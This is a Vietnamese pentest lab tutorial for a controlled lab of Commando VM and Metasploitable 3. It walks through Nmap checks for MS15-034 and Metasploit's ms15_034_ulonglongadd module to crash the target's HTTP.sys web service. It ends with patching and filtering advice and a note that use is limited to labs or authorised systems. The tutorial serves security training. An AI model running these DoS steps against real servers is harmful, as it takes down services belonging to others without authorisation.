Pentest Lab : Commando & Metasploitable 3 - Tấn Công "DOS" MS15 034
Pentest Lab: Tấn Công DoS Lỗ Hổng MS15-034 trên Metasploitable 3 với Commando VM
1. Giới Thiệu
MS15-034 là lỗ hổng thực thi mã từ xa (Remote Code Execution - RCE) và tấn công DoS trên HTTP.sys của Windows. Lỗ hổng này cho phép gửi các gói HTTP đặc biệt để làm sập dịch vụ web trên hệ điều hành Windows chưa vá lỗi.
2. Mục Tiêu Bài Lab
- Thiết lập môi trường lab với Commando VM và Metasploitable 3.
- Sử dụng các công cụ pentest (Metasploit, Nmap) để khai thác lỗ hổng MS15-034 và thực hiện tấn công DoS.
3. Thiết Lập Môi Trường
Bước 1: Cài Đặt Metasploitable 3
-
Tải Metasploitable 3:
- Truy cập GitHub: https://github.com/rapid7/metasploitable3.
-
Cài đặt Metasploitable 3:
- Làm theo hướng dẫn trong kho lưu trữ để cài đặt máy ảo.
-
Cấu hình IP:
- Đặt Metasploitable 3 và Commando VM trên cùng một mạng (Host-Only hoặc Bridged).
Bước 2: Cài Đặt Commando VM
- Tải Commando VM:
-
Cài đặt trên Windows VM:
- Cài đặt các công cụ cần thiết như Metasploit, Nmap, Burp Suite.
4. Thực Hiện Tấn Công MS15-034
Bước 1: Xác Minh Lỗ Hổng
-
Quét cổng dịch vụ web:
- Dùng Nmap trên Commando VM:
nmap -p 80,443 -sV
- Kiểm tra xem HTTP.sys có hoạt động không.
- Dùng Nmap trên Commando VM:
-
Kiểm tra lỗ hổng:
- Sử dụng script của Nmap:
nmap --script=http-vuln-cve2015-1635 -p 80
- Script sẽ kiểm tra xem mục tiêu có dễ bị khai thác bởi MS15-034 không.
- Sử dụng script của Nmap:
Bước 2: Tấn Công DoS
-
Sử dụng Metasploit:
- Khởi động Metasploit trên Commando VM:
msfconsole
- Khởi động Metasploit trên Commando VM:
-
Tìm module khai thác MS15-034:
search ms15-034
-
Chọn module DoS:
use auxiliary/dos/http/ms15_034_ulonglongadd
-
Cấu hình mục tiêu:
set RHOST
set RPORT 80 -
Thực hiện tấn công:
run
- Nếu tấn công thành công, dịch vụ web trên Metasploitable 3 sẽ bị crash.
Bước 3: Kiểm Tra Kết Quả
-
Kiểm tra trạng thái dịch vụ:
- Mở trình duyệt và cố gắng truy cập trang web trên Metasploitable 3.
- Dịch vụ web sẽ không phản hồi nếu DoS thành công.
-
Khởi động lại dịch vụ (nếu cần):
- Khởi động lại Metasploitable 3 để dịch vụ web hoạt động trở lại.
5. Phòng Chống Lỗ Hổng MS15-034
1. Vá lỗi hệ điều hành:
- Cập nhật bản vá từ Microsoft (MS15-034 Security Update).
2. Giới hạn HTTP Range Requests:
- Cấu hình web server để từ chối hoặc giới hạn Range Requests.
3. Sử dụng Firewall:
- Chặn các yêu cầu HTTP độc hại bằng IDS/IPS hoặc tường lửa.
6. Kết Luận
- Bài lab này minh họa cách khai thác lỗ hổng MS15-034 để thực hiện tấn công DoS. Đây là một kỹ năng quan trọng trong việc học pentesting và xử lý sự cố.
- Luôn nhớ rằng, các kỹ thuật này chỉ được sử dụng trong môi trường lab hoặc có sự cho phép từ chủ sở hữu hệ thống.